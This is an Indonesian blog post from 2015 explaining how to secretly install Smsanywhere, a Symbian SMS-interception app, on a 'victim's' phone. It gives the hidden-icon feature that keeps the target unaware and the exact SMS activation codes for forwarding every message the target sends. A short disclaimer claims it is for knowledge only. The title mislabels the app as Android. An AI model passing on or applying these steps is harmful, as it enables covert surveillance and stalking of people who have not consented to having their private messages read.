Kamis, 09 April 2015

aplikasi penyadap sms android

Smsanywhere adalah aplikasi berbasis Symbian yang berkemampuan menyadap sms. Tips ini cuma semata-mata utk pengetahuan & bukan untuk disalah gunakan. Sedikit saya terangkan mengenai Smsanywhere. Semua control pada aplikasi ini di control melalui sms, mulai dari pengaktifan, serta mematikan program. Aplikasi ini tidak memiliki icon yang muncul pada ponsel anda, disinilah letak ke unggulan lain aplikasi ini, dengan icon yg tdk muncul pada ponsel, maka target ngga akan menaruh kecurigaan apapun. Untuk cara pengaktifannya sebagai berikut: Aplikasi penyadap sms.

Donload Aplikasinya DISINI Aplikasi penyadap sms hp.




Install aplikasinya di HP engkau serta HP Korban Aplikasi penyadap sms android.

Setelah selesai penginstallan aplikasi, aktifkan aplikasi tersebut di HP korban dgn format sms: SA(spasi)Password(spasi)(ON) Contoh: SA 1234 ON Kirim sms itu ke nomor penyadap. Password Maksimal 8. Untuk berhenti SA 1234 OFF.

Jika engkau ingin menyadap setiap sms yang dikirimkan korban, ketikkan sms ini di HP korban dgn format: SA(spasi)Password(pasi)S1 Contoh: SA 1234 S1.

Bila sobat kepingin menyadap cuma lebih dari 5 hari, ketikkan sms ini ke HP korban dengan format: SA(spasi)Password(spasi)R1 Contoh SA 1234 R1.

Dengan demikian, nte akan selalu menerimasms korban akan selalu diteruskan ke HP anda setiap korban melakukan sms ke siapapun.!

Segala Resiko yang disebabkan oleh penyadapan yang sampean lakukan, bukan adalah tanggung jawab saya, Cara ini cuma untuk pengetahuan dan tidak utk disalahgunakan. Harap fikirkan resiko sebelum sampean melakukannya. Terimakasih...........

Label:

0 Komentar:

Posting Komentar

Berlangganan Posting Komentar [Atom]

<< Beranda